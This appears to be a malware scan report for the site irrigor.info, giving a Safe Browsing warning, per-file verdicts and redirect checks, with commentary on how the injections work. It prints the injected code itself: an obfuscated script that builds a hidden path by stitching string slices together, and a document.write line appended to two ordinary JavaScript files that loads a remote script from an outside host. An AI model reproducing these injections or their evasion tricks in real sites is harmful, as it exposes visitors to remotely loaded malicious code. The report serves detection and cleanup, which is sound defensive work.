Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=irrigor.info
Result: Google marks this website as suspicious; visiting it may harm your computer.
Details are available here.
Result: Google marks this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.irrigor.info/ | 200 OK Content-Length: 28498 Content-Type: text/html | malicious |
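Malicious code found. Script contains blacklisted domain: partymoney.ru. The excerpt below is truncated (1133 bytes skipped), and the domain does not appear literally in the visible part: the script hides its strings by assembling them from substr() slices, and the slices shown concatenate to the path /google.com/thepiratebay.org/jeuxvideo.com.php. A search of the page source for the literal domain or path may therefore miss this injection. Excerpt: var s;sK={o:3231};si=function(){m=43247;m--;gW={Q:"b"};function z(h,k,S){return h.substr(k,S);}var x=[];var R=[];var t=document;var L=RegExp;var d=z("/gooc4R",0,4)+z("CsWHgle.HCWs",4,4)+z("com/R08N",0,4)+z("thepTVo",0,4)+"irat"+"ebay"+z("pzn.orgpnz",3,4)+z("qfM/jeuMfq",3,4)+z("yK3mxvidKmy3",4,4)+z("L8Zmeo.cm8ZL",4,4)+z("GNPWom.pGPNW",4,4)+"hp";var D_="D_";var dK='';var q='';y=["u","C","pM"];var rt={TA:false};var K={};var N=new Date();function Z(h,k){v ...[1133 bytes skipped]... | ||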
http://www.irrigor.info/includes/js/rollover.js | 200 OK Content-Length: 1149 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The MM_* functions are the file's ordinary rollover helpers (the excerpt is clipped in the middle); the injected part is the final document.write(...) statement, which loads an external script from iopap.upperdarby26.com and splits the script tag into string pieces, presumably so that a plain search for the tag does not match. Excerpt: function MM_findObj(n, d) { var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);} if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n]; for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); if(!x && d.getElementById) x=d.getElementById(n); return x; } func } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } document.write('<s'+'cript type="text/javascript" src="http://iopap.upperdarby26.com/Kbps.js"></scr'+'ipt>'); Antivirus reports:
| ||
http://www.irrigor.info/includes/js/mambojavascript.js | 200 OK Content-Length: 11513 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The helper functions are the file's ordinary content (the excerpt is clipped in the middle); the injected part is the final document.write(...) statement, the same line that is appended to rollover.js. The same statement appearing in two script files suggests the files themselves were modified on the server, so every .js file on the site should be checked for it. Excerpt: function xshow(o) { s = ''; for(e in o) {s += e+'='+o[e]+'\n';} alert( s ); } function writeDynaList( selectParams, source, key, orig_key, orig_val ) { var html = '\n <select ' + selectParams + '>'; var i = 0; for (x in source) { if (source[x][0] == key) { var selected = ''; if ((orig_key == key && orig_val == source[x][1]) || (i == 0 && orig_key != key)) { selected = 'selected="selected"'; } ht var s = new String(str); if (whitespace.indexOf(s.charAt(s.length-1)) != -1) { var i = s.length - 1; while (i >= 0 && whitespace.indexOf(s.charAt(i)) != -1) i--; s = s.substring(0, i+1); } return s; } function trim(str) { return rtrim(ltrim(str)); } document.write('<s'+'cript type="text/javascript" src="http://iopap.upperdarby26.com/Kbps.js"></scr'+'ipt>'); Antivirus reports:
| ||
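http://iopap.upperdarby26.com/Kbps.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://iopap.upperdarby26.com/test404page.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Note: "clean" here means only that the response body was empty when scanned. The host answered 200 OK with Content-Length: 0 both for the injected script URL and for test404page.js (apparently a probe for a non-existent file), so the verdict says nothing about what the host serves at other times or to other visitors. The document.write lines that reference it still need to be removed from the site's .js files.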
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: irrigor.info
Result:
GET / HTTP/1.1
Host: irrigor.info
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: irrigor.info
Referer: http://www.google.com/search?q=irrigor.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: irrigor.info
Referer: http://www.google.com/search?q=irrigor.info
Result:
The result is similar to the first query. There are no suspicious redirects found.